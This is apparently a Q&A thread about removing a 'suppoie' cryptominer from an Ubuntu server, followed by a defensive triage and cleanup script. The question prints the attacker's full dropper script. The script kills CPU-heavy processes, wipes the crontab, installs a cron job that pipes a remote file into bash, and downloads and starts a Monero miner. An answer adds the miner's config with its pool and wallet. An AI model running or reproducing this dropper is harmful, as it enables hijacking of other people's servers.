suppoie malware removal (script hidden in a .jpg)

Found this on an Ubuntu 16.04 server. I guess it's malware, but is there a guide to make sure I can remove all of it?

    curl -s http://158.69.133.18:8220/logo7.jpg
    #!/bin/sh
    ps aux | grep -vw suppoie | awk '{if($3>40.0) print $2}' | while read procid
    do
    kill -9 $procid
    done
    rm -rf /dev/shm/jboss
    ps -fe|grep -w suppoie |grep -v grep
    if [ $? -eq 0 ]
    then
    pwd
    else
    crontab -r || true && \
    echo "* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s" >> /tmp/cron || true && \
    crontab /tmp/cron || true && \
    rm -rf /tmp/cron || true && \
    curl -o /var/tmp/config.json http://158.69.133.18:8220/1.json
    curl -o /var/tmp/suppoie http://158.69.133.18:8220/rig
    chmod 777 /var/tmp/suppoie
    cd /var/tmp
    proc=`grep -c ^processor /proc/cpuinfo`
    cores=$((($proc+1)/2))
    num=$(($cores*3))
    /sbin/sysctl -w vm.nr_hugepages=`$num`
    nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
    fi
    sleep 3
    echo "runing....."

Answer 1

It's in your www-data cron:

    sudo crontab -e -u www-data

You will see something like this:

    * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s

Kill the process and then remove it from /var/tmp.

Answer 2

I guess this is a bitcoin-mining malware; someone found a security hole in drupal and put this script on my server.

In my case it was in /var/spool/cron/crontabs/, also using the curl command:

    * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s

The script is in /var/tmp/config.json and suppoie, as follows:

    {
    "algo": "cryptonight",  // cryptonight (default) or cryptonight-lite
    "av": 0,                // algorithm variation, 0 auto select
    "background": true,     // true to run the miner in the background
    "colors": true,         // false to disable colored output
    "cpu-affinity": null,   // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
    "cpu-priority": null,   // set process priority (0 idle, 2 normal to 5 highest)
    "donate-level": 1,      // donate level, minimum 1%
    "log-file": null,       // log all output to a file, example: "c:/some/path/xmrig.log"
    "max-cpu-usage": 95,    // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
    "print-time": 60,       // print hashrate report every N seconds
    "retries": 5,           // number of times to retry before switch to backup server
    "retry-pause": 5,       // time to pause between retries
    "safe": false,          // true to safe adjust threads and av settings for current CPU
    "threads": null,        // number of miner threads
    "pools": [
        {
            "url": "stratum+tcp://monerohash.com:5555",   // URL of mining server
            "user": "41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo",                        // username for mining server
            "pass": "x",                       // password for mining server
            "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
            "nicehash": false                  // enable nicehash/xmrig-proxy support
        }
    ],
    "api": {
        "port": 0,                             // port for the miner API https://github.com/xmrig/xmrig/wiki/API
        "access-token": null,                  // access token for API
        "worker-id": null                      // custom worker-id for API
    }
    }

Deleting the lines from the crontabs and cleaning out /var/tmp/ seems to work.
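The cleanup both answers describe (find the cron line, kill the process, clear /var/tmp) as one checked script. This is an example added to this page, not code posted by the asker or by either answerer. It assumes only the indicators the thread shows (the 158.69.133.18:8220 URL piped into bash, /var/tmp/suppoie, /var/tmp/config.json, a process named suppoie), Ubuntu's per-user crontab spool at /var/spool/cron/crontabs, and that backups may be written to /root; the file name and the sample crontab lines in the comments are made up for the example.

```bash
#!/bin/sh
# Triage helper for the suppoie cron miner described in this thread.
# Added example code for this page, not code posted by the asker or either
# answerer. It assumes exactly the indicators shown above:
#   - a crontab line that pipes curl output from 158.69.133.18:8220 into bash
#   - the dropped files /var/tmp/suppoie and /var/tmp/config.json
#   - a running process named "suppoie"
# The *_text functions work on stdin, so they can be tried on a sample crontab;
# report_host is read-only; clean_host modifies the system and needs root.

# Regex for the cron persistence line. '[|]' is a literal pipe in ERE.
IOC_RE='curl[^|]*158\.69\.133\.18:8220.*[|][[:space:]]*(ba)?sh'
IOC_FILES='/var/tmp/suppoie /var/tmp/config.json'
# Per-user spool (where answer 2 found it) plus the system-wide cron files.
CRON_PATHS='/var/spool/cron/crontabs /etc/crontab /etc/cron.d'

# Print the malicious lines from a crontab on stdin. Exit 0 if any matched.
scan_crontab_text() {
    grep -E "$IOC_RE"
}

# Copy a crontab from stdin to stdout with the malicious lines removed.
# grep -v exits 1 when nothing is left, which is not an error here.
clean_crontab_text() {
    grep -vE "$IOC_RE" || true
}

# Read-only survey. Exit 0 if any indicator is present, 1 if the host is clean.
report_host() {
    found=1
    for p in $CRON_PATHS; do
        [ -e "$p" ] || continue
        if grep -rHE "$IOC_RE" "$p" 2>/dev/null; then found=0; fi
    done
    for f in $IOC_FILES; do
        if [ -e "$f" ]; then echo "dropped file present: $f"; found=0; fi
    done
    if pgrep -x suppoie >/dev/null 2>&1; then
        echo "suppoie running, pid(s): $(pgrep -x suppoie | tr '\n' ' ')"
        found=0
    fi
    return $found
}

# Remediate: strip the cron line from every per-user crontab (backup kept in
# /root), stop the miner, delete the dropped files, and reset vm.nr_hugepages
# to its default of 0. System cron files flagged by report_host are edited by hand.
clean_host() {
    for spool in /var/spool/cron/crontabs/*; do
        [ -f "$spool" ] || continue
        user=$(basename "$spool")
        if crontab -l -u "$user" 2>/dev/null | scan_crontab_text >/dev/null; then
            crontab -l -u "$user" > "/root/crontab.$user.bak"
            clean_crontab_text < "/root/crontab.$user.bak" | crontab -u "$user" -
            echo "cleaned crontab of $user (backup: /root/crontab.$user.bak)"
        fi
    done
    pkill -9 -x suppoie 2>/dev/null || true
    rm -f $IOC_FILES
    sysctl -w vm.nr_hugepages=0 >/dev/null
}

case "${1:-}" in
    report) report_host ;;
    apply)  clean_host ;;
    *)      echo "usage: $0 report|apply" >&2 ;;
esac
```

Run it as `sh suppoie_triage.sh report` first and `apply` as root once the output looks right. Three things in the dropper script above that a one-line cleanup misses: it ran `crontab -r` before installing its own entry, so whatever that user's crontab held before is gone and has to be restored from a backup; its first loop sent SIGKILL to every process using more than 40% CPU, so other services on the box may need restarting; and because the entry sat in www-data's crontab, the web application itself executed the dropper, so unless the application hole (drupal, per answer 2) is patched the same thing can be dropped again. If the attacker rotates the host or file names (logo7.jpg, 1.json, rig), adjust IOC_RE accordingly.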
